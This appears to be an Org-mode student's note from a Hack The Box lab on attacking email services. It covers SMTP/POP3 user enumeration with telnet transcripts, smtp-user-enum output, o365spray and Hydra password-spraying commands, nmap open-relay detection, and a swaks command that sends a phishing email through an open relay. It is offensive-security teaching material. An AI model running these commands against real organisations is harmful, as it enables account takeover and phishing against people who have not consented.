:PROPERTIES:
:ID:       a903a61e-d622-4459-a483-06ddf3f20b03
:END:
#+title: email srv
#+OPTIONS: toc:3 ^:{}

* TOC :toc_3:
- [[#attacking-email-services][Attacking Email Services]]
  - [[#enumeration][Enumeration]]
    - [[#host---mx-records][HOST - MX records]]
    - [[#dig---mx-records][DIG - MX records]]
    - [[#host---a-records][HOST - A Records]]
    - [[#ports][PORTS]]
  - [[#misconfigurations][Misconfigurations]]
    - [[#authentication][Authentication]]
    - [[#automate][Automate]]
  - [[#cloud-enumeration][Cloud Enumeration]]
    - [[#o365-spray][O365 Spray]]
  - [[#password-attacks][Password Attacks]]
    - [[#password-spray][Password Spray]]
  - [[#protocol-specifics][Protocol Specifics]]
    - [[#open-relay][Open Relay]]

* Attacking Email Services
- sending -> =SMTP=
- downloading -> =POP3= / =IMAP4=

** Enumeration
- complex and require us to enum multiple servers, ports, services
- most companies have cloud
- can use =Mail eXchanger= (=MX=) DNS record to ID mail server.
  - specifies mail server responsible for accepting email msgs
- =host= or =dig= & [[https://mxtoolbox.com/][MXToolbox]]

*** HOST - MX records
#+begin_src bash
host -t MX <domain>
#+end_src

*** DIG - MX records
~dig mx <domain> | grep "MX" | grep -v ";"~

*** HOST - A Records
- ~host -t A <domain>~

*** PORTS
**** Unencrypted
1. =25= -> SMTP
2. =143= -> IMAP4
3. =110= -> POP3
**** Encrypted
1. =465= -> SMTP
2. =587= -> SMTP (*STARTTLS*)
3. =993= -> IMAP4 Encrypted
4. =995= -> POP3 Encrypted
   
** Misconfigurations

*** Authentication
- SMTP server has diff cmds to use to enum valid usernames =VRFY=, =EXPN=, =RCPT TO=
- possible to password spray if enum valid usernames
  
**** VRFY
- instructs recieving SMTP server to check validity of particular email username
- server will respond indicating if user exists or not
  - can be disabled
#+begin_src bash
biscuitrescue@htb[/htb]$ telnet 10.10.110.20 25

Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)


VRFY root

252 2.0.0 root


VRFY www-data

252 2.0.0 www-data


VRFY new-user

550 5.1.1 <new-user>: Recipient address rejected: User unknown in local recipient table
#+end_src

**** EXPN
- similar to =VRFY=, but when used w distro list, will list all users on that list
- can be bigger problem than =VRFY=, since sites have alias = *"all"*
#+begin_src bash
biscuitrescue@htb[/htb]$ telnet 10.10.110.20 25

Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)


EXPN john

250 2.1.0 john@inlanefreight.htb


EXPN support-team

250 2.0.0 carol@inlanefreight.htb
250 2.1.5 elisa@inlanefreight.htb

#+end_src

**** RCPT TO
- IDs recipient of email msg.
- can be repeated multiple times for given msg to deliver single msg to multiple recipients
#+begin_src bash
biscuitrescue@htb[/htb]$ telnet 10.10.110.20 25

Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
220 parrot ESMTP Postfix (Debian/GNU)


MAIL FROM:test@htb.com
it is
250 2.1.0 test@htb.com... Sender ok


RCPT TO:julio

550 5.1.1 julio... User unknown


RCPT TO:kate

550 5.1.1 kate... User unknown


RCPT TO:john

250 2.1.5 john... Recipient ok
#+end_src

**** POP3 USER cmd
#+begin_src bash
biscuitrescue@htb[/htb]$ telnet 10.10.110.20 110

Trying 10.10.110.20...
Connected to 10.10.110.20.
Escape character is '^]'.
+OK POP3 Server ready

USER julio

-ERR


USER john

+OK
#+end_src

*** Automate
- =smtp-user-enum=
  - enum mode =-M= -> =VRFY=, =EXPN=, =RCPT= & =-U= w file of list of users to enum.
  - =-D= for email addr domain, target w =-t=
#+begin_src bash
biscuitrescue@htb[/htb]$ smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7

Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-enum )

 ----------------------------------------------------------
|                   Scan Information                       |
 ----------------------------------------------------------

Mode ..................... RCPT
Worker Processes ......... 5
Usernames file ........... userlist.txt
Target count ............. 1
Username count ........... 78
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............ inlanefreight.htb

######## Scan started at Thu Apr 21 06:53:07 2022 #########
10.129.203.7: jose@inlanefreight.htb exists
10.129.203.7: pedro@inlanefreight.htb exists
10.129.203.7: kate@inlanefreight.htb exists
######## Scan completed at Thu Apr 21 06:53:18 2022 #########
3 results.

78 queries in 11 seconds (7.1 queries / sec)
#+end_src

** Cloud Enumeration

*** O365 Spray 
- username enum & passw spraying tool for Office 265
- reimplements collection of enum & spray techniques

**** Spray
- ~python3 o365spray.py --validate --domain msplaintext.xyz~
- ~python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz~

** Password Attacks

*** Password Spray
**** Hydra
- ~hydra -L users.txt -p 'Company01!' -f <ip> pop3~
- if cloud srv support SMTP, POP3, IMAP4, may be able to perform pspray, but usually blocked

**** O365
- ~python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz~

** Protocol Specifics
*** Open Relay
- =SMTP= which is improperly configured to allow unauth email relay
- allow mails from any source to be transparently re-routed through open relay server
- masks source of messages & makes it look like mail originated from open relay server
- ID w *nmap smtp-open-relay*
  - ~nmap -p25 -Pn --script smtp-open-relay <ip>~
  - ~swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Company Notification' --body 'Hi All, we want to hear from you! Please complete the following survey. http://mycustomphishinglink.com/' --server 10.10.11.213~ (connect through any mail client)
